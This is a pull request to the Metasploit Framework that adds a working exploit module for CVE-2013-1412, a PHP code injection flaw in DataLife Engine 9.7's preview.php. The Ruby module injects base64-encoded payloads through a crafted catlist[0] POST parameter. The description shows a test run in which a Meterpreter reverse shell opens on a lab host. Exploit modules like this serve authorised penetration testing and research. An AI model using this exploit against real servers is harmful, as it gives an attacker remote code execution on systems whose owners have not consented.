### PR TITLE
added module for cve-2013-1412

### DIFF
--- a/modules/exploits/unix/webapp/datalife_preview_exec.rb
+++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb
@@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def base
 		base = normalize_uri(target_uri.path)
+		base << '/' if base[-1, 1] != '/'
 		return base
 	end
 
@@ -62,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		fingerprint = rand_text_alpha(4+rand(4))
 		res = send_request_cgi(
 			{
-				'uri'       =>  "#{base}/engine/preview.php",
+				'uri'       =>  "#{base}engine/preview.php",
 				'method'    => 'POST',
 				'vars_post' =>
 					{
@@ -83,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
 		res = send_request_cgi(
 			{
-				'uri'       =>  "#{base}/engine/preview.php",
+				'uri'       =>  "#{base}engine/preview.php",
 				'method'    => 'POST',
 				'vars_post' =>
 					{

--- a/modules/exploits/unix/webapp/datalife_preview_exec.rb
+++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb
@@ -1,0 +1,94 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'DataLife Engine preview.php PHP Code Injection',
+			'Description'    => %q{
+					This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
+				The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
+				with the e modifier, which allows to inject arbitrary php code, when the template
+				in use contains a [catlist] or [not-catlist] tag.
+			},
+			'Author'         =>
+				[
+					'EgiX', # Vulnerability discovery
+					'juan vazquez' # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2013-1412' ],
+					[ 'BID', '57603' ],
+					[ 'EDB', '24438' ],
+					[ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
+					[ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
+				],
+			'Privileged'     => false,
+			'Platform'       => ['php'],
+			'Arch'           => ARCH_PHP,
+			'Payload'        =>
+				{
+					'Keys'   => ['php']
+				},
+			'DisclosureDate' => 'Jan 28 2013',
+			'Targets'        => [ ['DataLife Engine 9.7', { }], ],
+			'DefaultTarget'  => 0
+			))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+			], self.class)
+	end
+
+	def base
+		base = normalize_uri(target_uri.path)
+		return base
+	end
+
+	def check
+		fingerprint = rand_text_alpha(4+rand(4))
+		res = send_request_cgi(
+			{
+				'uri'       =>  "#{base}/engine/preview.php",
+				'method'    => 'POST',
+				'vars_post' =>
+					{
+						'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//"
+					}
+			})
+
+		if res and res.code == 200 and res.body =~ /#{fingerprint}/
+			return Exploit::CheckCode::Vulnerable
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def exploit
+		@peer = "#{rhost}:#{rport}"
+
+		print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
+		res = send_request_cgi(
+			{
+				'uri'       =>  "#{base}/engine/preview.php",
+				'method'    => 'POST',
+				'vars_post' =>
+					{
+						'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//"
+					}
+			})
+	end
+end


### PR DESCRIPTION
I've used a custom template to trigger vulnerability. Template preview.tpl sent to @wchen-r7 via e-mail.

The vulnerable app can be downloaded from:

http://www.exploit-db.com/exploits/24438/

The 9.7 version included in the vendor page has been patched! The module check method allows to test vulnerability.

Test results:

```
msf > use exploit/unix/webapp/datalife_preview_exec 
msf  exploit(datalife_preview_exec) > show options

Module options (exploit/unix/webapp/datalife_preview_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   DataLife Engine 9.7


msf  exploit(datalife_preview_exec) > reload
[*] Reloading module...
msf  exploit(datalife_preview_exec) > set targeturi /upload
targeturi => /upload
msf  exploit(datalife_preview_exec) > set rhost 192.168.1.131
rhost => 192.168.1.131
msf  exploit(datalife_preview_exec) > check
[+] The target is vulnerable.
msf  exploit(datalife_preview_exec) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.131:80 - Exploiting the preg_replace() to execute PHP code
[*] Sending stage (39217 bytes) to 192.168.1.131
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.131:41935) at 2013-01-31 16:08:30 +0100

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 i686
Meterpreter : php/php
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.131 - Meterpreter session 1 closed.  Reason: User exit

```
